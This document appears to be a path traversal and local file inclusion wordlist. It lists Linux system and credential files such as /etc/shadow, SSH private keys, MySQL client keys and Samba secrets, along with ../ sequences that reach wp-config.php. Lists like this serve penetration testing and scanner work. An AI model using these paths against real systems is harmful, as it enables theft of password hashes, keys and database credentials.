/etc/aliases
/etc/aliases.db
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/envvars
/etc/apache/apache.conf
/etc/bash.bashrc
/etc/ca-certificates.conf
/etc/crontab
/etc/debconf.conf
/etc/debian_version
/etc/environment
/etc/exports
/etc/fstab
/etc/ftpallow
/etc/ftpusers
/etc/group
/etc/hostname
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/conf/httpd.conf
/etc/httpd/.htpasswd
/etc/httpd/httpd.conf
/etc/letsencrypt/options-ssl-nginx.conf
/etc/machine-id
/etc/mysql/client-cert.pem
/etc/mysql/client-key.pem
/etc/mysql/conf.d/mysql.cnf
/etc/mysql/conf.d/mysqldump.cnf
/etc/mysql/debian.cnf
/etc/mysql/mariadb.cnf
/etc/mysql/mariadb.conf.d/50-server.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf.fallback
/etc/network/interfaces
/etc/networks
/etc/nginx/conf.d/default.conf
/etc/nginx/conf.d/default.conf/etc/apache2/apache2.conf
/etc/nginx/conf.d/scgi_params
/etc/nginx/fastcgi.conf
/etc/nginx/nginx.conf
/etc/nginx/proxy.conf
/etc/nginx/proxy_params
/etc/os-release
/etc/passwd
/etc/resolv.conf
/etc/samba/smb.conf
/etc/shadow
/etc/shadowg
/etc/ssh/ssh_config
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/proc/misc
/proc/partitions
/proc/self/cmdline
/proc/self/environ
/proc/uptime
/proc/version
/proc/vmstat
/run/httpd.pid
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/known_hosts
/usr/local/etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/var/lib/mlocate/mlocate.db
/var/lib/samba/account_policy.tdb
/var/lib/samba/group_mapping.tdb
/var/lib/samba/private/passdb.tdb
/var/lib/samba/private/secrets.tdb
/var/lib/samba/registry.tdb
/var/lib/samba/share_info.tdb
/var/log/mysql/error.log
/var/log/mysql/mysql.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/run/apache2/apache2.pid
/var/run/httpd.pid
/var/www/html/index.htm
/var/www/html/index.html
/var/www/html/index.php
/var/www/HTML/index.php
/var/www/public/index.php
/var/www/site/index.php
/var/www/web/index.php
/var/www/website/index.php
../../../../../../../../../index.php
../../../../../../../../index.php
../../../../../../../index.php
../../../../../../index.php
../../../../../index.php
../../../../index.php
../../../index.php
../../index.php
../index.php
../../../../../../../../admin.php
../../../../../../../admin.php
../../../../../../admin.php
../../../../../admin.php
../../../../admin.php
../../../admin.php
../../admin.php
../admin.php
../../../../../../../wp-config.php
../../../../../../wp-config.php
../../../../../wp-config.php
../../../../wp-config.php
../../../wp-config.php
../../wp-config.php
../wp-config.php
./wp-config.php
